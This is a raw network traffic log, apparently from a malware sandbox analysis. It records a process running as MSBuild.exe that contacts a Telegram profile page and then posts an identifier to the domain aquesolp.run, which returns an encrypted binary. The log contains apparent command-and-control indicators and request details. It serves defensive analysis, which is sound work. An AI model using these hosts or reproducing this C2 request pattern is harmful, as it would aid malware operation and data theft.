                                          Apr 12, 2025 01:45:08.633219004 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.633229971 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.828432083 CEST49672443192.168.2.5204.79.197.203
                                          Apr 12, 2025 01:45:09.237238884 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:09.237521887 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:09.237535954 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:09.237596035 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.340990067 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.341041088 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:10.341367960 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.341367960 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.341408968 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:10.574609995 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:10.574780941 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.575709105 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.575726032 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:10.576066971 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:10.577410936 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.577410936 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:10.577454090 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.113081932 CEST44349697104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.113348961 CEST49697443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.438071966 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.438163996 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.438261032 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.438621044 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.438647032 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.696369886 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.696466923 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.697698116 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.697726965 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.698069096 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.699213982 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700043917 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700094938 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.700227976 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700287104 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.700421095 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700463057 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.700615883 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700663090 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.700843096 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.700891972 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.701097012 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.701150894 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.701179028 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.701356888 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.701419115 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.744276047 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.744611979 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.744723082 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.744756937 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.788275003 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.788505077 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.788566113 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.788626909 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.832267046 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:11.832408905 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:11.876266003 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:12.071475029 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.454682112 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.454978943 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.455060959 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.455151081 CEST49698443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.455193996 CEST44349698104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.465508938 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.465603113 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.465688944 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.466244936 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.466284990 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.695643902 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.695751905 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.710413933 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.710463047 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.711209059 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:13.712886095 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.712886095 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:13.713100910 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.216957092 CEST49675443192.168.2.52.23.227.208
                                          Apr 12, 2025 01:45:14.216994047 CEST443496752.23.227.208192.168.2.5
                                          Apr 12, 2025 01:45:14.268979073 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269118071 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269205093 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.269211054 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269275904 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269370079 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.269380093 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269409895 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269565105 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269623041 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.269640923 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269692898 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.269706964 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.269850969 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.273658037 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.288259983 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.288300037 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:14.288325071 CEST49700443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:14.288340092 CEST44349700104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:17.202162981 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:46:01.500293970 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:46:01.607074022 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:46:01.608294010 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:46:35.124443054 CEST49682443192.168.2.5150.171.28.10
                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 12, 2025 01:45:00.948101044 CEST4989053192.168.2.51.1.1.1
                                          Apr 12, 2025 01:45:01.055605888 CEST53498901.1.1.1192.168.2.5
                                          Apr 12, 2025 01:45:02.878690004 CEST6461053192.168.2.51.1.1.1
                                          Apr 12, 2025 01:45:02.985050917 CEST53646101.1.1.1192.168.2.5
                                          Apr 12, 2025 01:45:03.880110025 CEST6340953192.168.2.51.1.1.1
                                          Apr 12, 2025 01:45:04.040831089 CEST53634091.1.1.1192.168.2.5
                                          Apr 12, 2025 01:45:13.668268919 CEST6427853192.168.2.51.1.1.1
                                          Apr 12, 2025 01:45:13.821827888 CEST53642781.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Apr 12, 2025 01:45:00.948101044 CEST192.168.2.51.1.1.10xb9efStandard query (0)c.pki.googA (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:02.878690004 CEST192.168.2.51.1.1.10xef5eStandard query (0)t.meA (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:03.880110025 CEST192.168.2.51.1.1.10x6ab1Standard query (0)aquesolp.runA (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:13.668268919 CEST192.168.2.51.1.1.10x920aStandard query (0)c2a9c95e369881c67228a6591cac2686.clo.footprintdns.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Apr 12, 2025 01:45:00.394963026 CEST1.1.1.1192.168.2.50x6c6dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:00.394963026 CEST1.1.1.1192.168.2.50x6c6dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:01.055605888 CEST1.1.1.1192.168.2.50xb9efNo error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                          Apr 12, 2025 01:45:01.055605888 CEST1.1.1.1192.168.2.50xb9efNo error (0)pki-goog.l.google.com142.250.9.94A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:02.985050917 CEST1.1.1.1192.168.2.50xef5eNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:04.040831089 CEST1.1.1.1192.168.2.50x6ab1No error (0)aquesolp.run104.21.22.10A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:04.040831089 CEST1.1.1.1192.168.2.50x6ab1No error (0)aquesolp.run172.67.201.178A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:13.821827888 CEST1.1.1.1192.168.2.50x920aName error (3)c2a9c95e369881c67228a6591cac2686.clo.footprintdns.comnonenoneA (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:14.493256092 CEST1.1.1.1192.168.2.50x925fNo error (0)ax-ring.ax-9999.ax-msedge.netax-9999.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Apr 12, 2025 01:45:14.493256092 CEST1.1.1.1192.168.2.50x925fNo error (0)ax-9999.ax-msedge.net150.171.28.254A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:14.493256092 CEST1.1.1.1192.168.2.50x925fNo error (0)ax-9999.ax-msedge.net150.171.27.254A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:26.890918016 CEST1.1.1.1192.168.2.50x9affNo error (0)ax-ring.ax-9999.ax-msedge.netax-9999.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Apr 12, 2025 01:45:26.890918016 CEST1.1.1.1192.168.2.50x9affNo error (0)ax-9999.ax-msedge.net150.171.28.254A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:45:26.890918016 CEST1.1.1.1192.168.2.50x9affNo error (0)ax-9999.ax-msedge.net150.171.27.254A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.34A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.37A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.35A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.37A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.21A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.35A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.38A (IP address)IN (0x0001)false
                                          Apr 12, 2025 01:46:14.695910931 CEST1.1.1.1192.168.2.50x78c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.18A (IP address)IN (0x0001)false
                                          • t.me
                                          • aquesolp.run
                                          • c.pki.goog
                                          Session IDSource IPSource PortDestination IPDestination Port
                                          0192.168.2.549691142.250.9.9480
                                          TimestampBytes transferredDirectionData
                                          Apr 12, 2025 01:45:01.164108992 CEST202OUTGET /r/gsr1.crl HTTP/1.1
                                          Cache-Control: max-age = 3000
                                          Connection: Keep-Alive
                                          Accept: */*
                                          If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: c.pki.goog
                                          Apr 12, 2025 01:45:01.272645950 CEST1358INHTTP/1.1 200 OK
                                          Accept-Ranges: bytes
                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                          Cross-Origin-Resource-Policy: cross-origin
                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                          Content-Length: 1739
                                          X-Content-Type-Options: nosniff
                                          Server: sffe
                                          X-XSS-Protection: 0
                                          Date: Fri, 11 Apr 2025 23:43:36 GMT
                                          Expires: Sat, 12 Apr 2025 00:33:36 GMT
                                          Cache-Control: public, max-age=3000
                                          Age: 85
                                          Last-Modified: Mon, 07 Apr 2025 13:58:00 GMT
                                          Content-Type: application/pkix-crl
                                          Vary: Accept-Encoding
                                          Data Raw: 30 82 06 c7 30 82 05 af 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 10 30 0e 06 03 55 04 0b 13 07 52 6f 6f 74 20 43 41 31 1b 30 19 06 03 55 04 03 13 12 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 20 43 41 17 0d 32 35 30 34 30 37 30 30 30 30 30 30 5a 17 0d 32 35 30 37 31 35 30 30 30 30 30 30 5a 30 82 04 f1 30 2a 02 0b 04 00 00 00 00 01 1e 44 a5 e4 04 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 29 45 c3 a8 0f 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 20 19 c1 8d 68 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2c 5e 7f 1a 88 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 15 4b 5a [TRUNCATED]
                                          Data Ascii: 000*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA250407000000Z250715000000Z00*D141125000000Z00U0*)E141125000000Z00U0* h141125000000Z00U0*,^141125000000Z00U0*KZ160107000000Z00U0*/NIR170419000000Z00U0*/NG170419000000Z00U0*/N9191120000000Z00U0*/N=k191204000000Z00U0*/N;X191204000000Z00U0-Ga7.u200630000000Z00U0-G
                                          Apr 12, 2025 01:45:01.272691965 CEST1093INData Raw: c0 41 1c 9f 3e 54 68 41 17 0d 32 30 30 36 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2d 02 0e 47 c3 10 00 c0 4b fa 8a 26 54 b7 41 ec 2b 17 0d 32 30 30 36 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a
                                          Data Ascii: A>ThA200630000000Z00U0-GK&TA+200630000000Z00U0*6::200711160000Z00U0/vSBS%V>200728000000Z00U0/vSF-Kg>)200728000000Z00U0/vSHqe]c
                                          Apr 12, 2025 01:45:01.277698994 CEST200OUTGET /r/r4.crl HTTP/1.1
                                          Cache-Control: max-age = 3000
                                          Connection: Keep-Alive
                                          Accept: */*
                                          If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: c.pki.goog
                                          Apr 12, 2025 01:45:01.387940884 CEST1241INHTTP/1.1 200 OK
                                          Accept-Ranges: bytes
                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                          Cross-Origin-Resource-Policy: cross-origin
                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                          Content-Length: 530
                                          X-Content-Type-Options: nosniff
                                          Server: sffe
                                          X-XSS-Protection: 0
                                          Date: Fri, 11 Apr 2025 23:43:37 GMT
                                          Expires: Sat, 12 Apr 2025 00:33:37 GMT
                                          Cache-Control: public, max-age=3000
                                          Age: 84
                                          Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                                          Content-Type: application/pkix-crl
                                          Vary: Accept-Encoding
                                          Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED]
                                          Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549692149.154.167.994437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:03 UTC61OUTGET /asdawfq HTTP/1.1
                                          Connection: Keep-Alive
                                          Host: t.me
                                          2025-04-11 23:45:03 UTC512INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Fri, 11 Apr 2025 23:45:03 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 12315
                                          Connection: close
                                          Set-Cookie: stel_ssid=275bf77f28ebbd6ae7_16130923523725042058; expires=Sat, 12 Apr 2025 23:45:03 GMT; path=/; samesite=None; secure; HttpOnly
                                          Pragma: no-cache
                                          Cache-control: no-store
                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                          Strict-Transport-Security: max-age=35768000
                                          2025-04-11 23:45:03 UTC12315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 56 69 65 77 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70
                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: View @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.p


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549693104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:04 UTC263OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 65
                                          Host: aquesolp.run
                                          2025-04-11 23:45:04 UTC65OUTData Raw: 75 69 64 3d 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 26 63 69 64 3d
                                          Data Ascii: uid=de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627&cid=
                                          2025-04-11 23:45:04 UTC786INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:04 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 34736
                                          Connection: close
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jT7hK04zgKpiOAzrFOEvP7Y5K2LELwugZwVwjEqUofF4xObiYO%2FgfUWd%2FLKsEz9P%2BNUuoNn%2BBa1aBdB92l2cHtjQUmZ2vO3z78mHVNWh%2BOS8DxXUnO6kRcdZ9cLZL0U%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b033e15d6b4-IAD
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=121569&min_rtt=121496&rtt_var=25758&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=964&delivery_rate=33136&cwnd=252&unsent_bytes=0&cid=237b0b93dfa5974f&ts=600&x=0"
                                          2025-04-11 23:45:04 UTC583INData Raw: 4e 24 de 32 41 56 52 fd f6 a9 a0 f8 6d fa f2 6e f4 58 99 47 c6 7f 49 98 21 df 57 fd 97 68 6b bb 9f fb 64 52 f0 b6 b5 2c be ad 48 e8 c6 ac 33 9b d2 c3 5f fc 21 06 7f 5a bb 06 97 0d 3d 37 5e ad db f5 16 c1 f0 97 72 8c 43 7e ac 1c 45 ae 6b f6 74 65 9b 23 0e 56 88 9b 8c 49 9c 02 98 79 59 bb a0 7c 7b 65 e7 bb 70 a7 ba cb ca 4b 48 20 46 d8 47 47 d6 3b 8a dd 6f 07 e2 19 8c 82 51 1e 76 67 5d ea 26 4c 7a 2d b6 d3 f4 73 69 3a 7e 12 43 ed a8 b1 82 a2 d4 37 5c d3 8b bb 0f 85 2a 1a 6f 6c 4a 26 1e de fa ff 70 8e 20 b7 93 12 81 86 74 cb 95 dc 5d cd ba 8f 7a f0 8c 19 78 84 a1 6a 1f aa ce 59 4d 81 da 66 d1 db 76 58 08 00 81 0c 76 6f 79 70 0d 30 38 8a 8e d2 ab 52 29 37 db 56 25 58 80 33 22 19 a0 7e cf f3 66 e7 e1 e2 51 0f e0 5b 82 54 32 e6 9c e8 7a af 89 71 ae dd db c1 e6
                                          Data Ascii: N$2AVRmnXGI!WhkdR,H3_!Z=7^rC~Ekte#VIyY|{epKH FGG;oQvg]&Lz-si:~C7\*olJ&p t]zxjYMfvXvoyp08R)7V%X3"~fQ[T2zq
                                          2025-04-11 23:45:04 UTC1369INData Raw: 05 db d1 b5 6a 5c b2 f4 4b a4 76 f3 34 e2 f1 1b 3b 93 b1 b0 03 fa 13 6e e8 66 4b ec be 8f f0 43 8d 93 eb e0 80 5e ae 37 b7 41 1e 4a 5c e0 e7 47 3c 6a 77 8c 96 82 12 d0 d3 0e 69 f8 ae 55 81 56 02 b3 f2 de ae 72 2b cd 18 3e 9f 0f b0 95 85 4b ea 5d 79 f8 3b 5b 32 4d 21 e3 61 ba a0 24 7b 17 0a a1 b6 38 ee 1f 3a a0 6d b4 f3 50 52 2f 5a 54 4e 91 1e 32 cc 25 ee cb e1 5f 7e 9c c0 b8 69 50 a6 70 20 6a 82 d4 9f 42 f6 a4 67 59 c7 08 86 b8 d4 3f 71 17 d0 1b c0 3e 4a 6e d9 46 66 3e 9e 42 44 5f 6b 36 08 00 c6 7b 2b 27 34 ee 10 24 2d 7c 6b b7 a9 c5 bf 19 b5 d3 3d b3 a2 71 ad dd a7 ec 6f ef df e7 e2 f0 34 62 56 f7 7b 0a f4 fb c0 6a ab 31 07 b9 a2 a5 c0 5d 95 93 ee c3 d0 91 b9 28 f1 22 fc 78 2a 75 ec 2f 0f a8 a4 3f 0b 11 11 24 b1 42 ac 1e a2 45 e0 9d b1 08 e8 39 2d cd 19
                                          Data Ascii: j\Kv4;nfKC^7AJ\G<jwiUVr+>K]y;[2M!a${8:mPR/ZTN2%_~iPp jBgY?q>JnFf>BD_k6{+'4$-|k=qo4bV{j1]("x*u/?$BE9-
